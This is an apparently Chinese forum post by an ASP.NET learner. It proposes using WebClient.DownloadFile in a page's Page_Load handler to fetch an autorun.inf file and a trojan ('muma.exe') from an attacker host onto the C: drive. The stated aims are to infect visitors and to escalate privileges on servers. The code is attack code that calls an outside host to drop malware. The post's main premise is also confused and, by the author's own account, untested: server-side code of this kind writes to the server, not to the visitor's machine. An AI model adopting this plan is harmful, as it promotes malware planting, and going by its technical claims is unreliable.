學習asp.net中看到這樣一段代碼,是下載文件用的,試了下覺得挺危險的,可能可以被非法利用。(當然還沒有按我的想法去測試,因爲我現在在手提上沒有安裝IIS,不知道能不能成功 )(因爲在之前我沒有怎麼學習過asp.net,所以不知道這個問題在網上被討論過了沒有,如果已經被關注過了,勿笑)
代碼是利用System.Net.WebClient進行下載,但問題是下載過程可以完全後臺實現 ,而打開頁面的人卻毫不知情,這就給病毒的傳播提供了機會。
例如,我在一個aspx頁面的Page_Load事件裏寫上這麼一段代碼。
protected void Page_Load(object sender, EventArgs e)
{
System.Net.WebClient wc = new System.Net.WebClient();
wc.DownloadFile("http://download.rising.com.cn/zsgj/Vikingkiller.scr", "d://Vikingkiller.scr");
}
只要一瀏覽該頁面,D盤下就自動下載了一個Vikingkiller.sc的文件。可能大家還是沒有意識到這個的危險性,認爲僅僅是自動下載但不會自動執行那就對系統沒有影響。但是細想下當前流行的U盤病毒是怎麼傳播的---利用磁盤根目錄下的autorun.inf可以實現程序雙擊打開磁盤的時候自動運行程序。因此,一個惡意頁面可以這樣構造.在http://target/上放置一個autorun.inf和帶木馬的程序(假設爲muma.exe吧),然後某個自己站點(或被黑站點)的aspx頁面上寫上一段
protected void Page_Load(object sender, EventArgs e)
{
System.Net.WebClient wc = new System.Net.WebClient();
wc.DownloadFile("http://target/autorun.inf", "c://autorun.inf");
wc.DownloadFile("http://target/muma.exe", "c://muma.exe");
}
其中autorun.inf的代碼就是實現自動執行muma.exe。這樣當用戶瀏覽了帶有該代碼的頁面後就會在自動下載autorun.inf和muma.exe到C盤,當某天用戶雙擊打開c盤後,就這樣中招了。
如果這樣的做法可行的話,擴展開來還可以用在服務器的提權中,通常在服務器上的權限設置比較嚴禁,取得某站點的權限後很可能對其它目錄都沒有權限讀寫,利用這樣的代碼,可以引誘服務器管理員在遠程登陸時訪問被黑站點的頁面,這時就可以實現把木馬程序自動下載到別的目錄了。
當然,未經測試,不知道下載回來的autorun.inf不是隱藏屬性時會不會自動執行,有待試驗。